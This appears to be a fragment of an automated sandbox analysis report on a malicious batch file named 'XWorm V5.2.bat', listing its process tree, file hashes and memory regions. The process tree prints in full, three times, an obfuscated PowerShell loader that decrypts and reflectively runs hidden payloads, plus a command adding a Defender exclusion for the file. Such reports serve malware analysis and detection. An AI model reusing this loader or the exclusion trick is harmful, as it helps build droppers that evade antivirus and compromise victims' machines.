                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var 
(,[string[]] ('')); "
                                                        5⤵
                                                          PID:1632
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          5⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1280
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:536
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                      3⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2112
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var 
(,[string[]] ('')); "
                                                        4⤵
                                                          PID:2900
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2928
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2880
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                      2⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2664
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var 
(,[string[]] ('')); "
                                                        3⤵
                                                          PID:2292
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          3⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1984

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat

                                                      Filesize

                                                      12.3MB

                                                      MD5

                                                      1a270a2d79f958a83af1ab2b5805e43c

                                                      SHA1

                                                      aeb2f51a0d1377a25fdcd614fc96fe6b3afbbeeb

                                                      SHA256

                                                      5a0ee0516cf26c772261c81a9cbc45fa625268576debb7d8b38609687554544c

                                                      SHA512

                                                      00bec3f89f9f27236adf0167d6382b60a2be56bdb6b00aae0117396e30e77a993b97d2b7f2af3ae96b81bce0b55bf177d4c4d0c272df05d72c2dc55577b14191

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EZ3IQV36WKD3F1BFXVG1.temp

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      93e39f76d77b580fa62d450532298270

                                                      SHA1

                                                      354372f4ed848fe8c790e8e6e700a595e002c828

                                                      SHA256

                                                      b833caf25d47174e317e35221ed2403bff6ac13af2d054ef654dd7ef745b32ae

                                                      SHA512

                                                      230a04565c3430e12963022e42b04ab725f8882ecf2c9edb6af61b50a985853eb2cc7e97434125003ccc46fa70330d263b7db3ce95e12d61d090fe9a2e2f3a6c

                                                    • \??\PIPE\srvsvc

                                                      MD5

                                                      d41d8cd98f00b204e9800998ecf8427e

                                                      SHA1

                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                      SHA256

                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                      SHA512

                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                    • memory/536-26-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                    • memory/536-27-0x0000000001DC0000-0x0000000001DC8000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/2596-3-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                    • memory/2596-34-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                    • memory/2820-20-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                    • memory/2820-0-0x000007FEF5493000-0x000007FEF5494000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2820-2-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                    • memory/2820-1-0x0000000000CA0000-0x0000000001EE2000-memory.dmp

                                                      Filesize

                                                      18.3MB

                                                    • memory/2880-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                    • memory/2880-9-0x0000000002970000-0x0000000002978000-memory.dmp

                                                      Filesize

                                                      32KB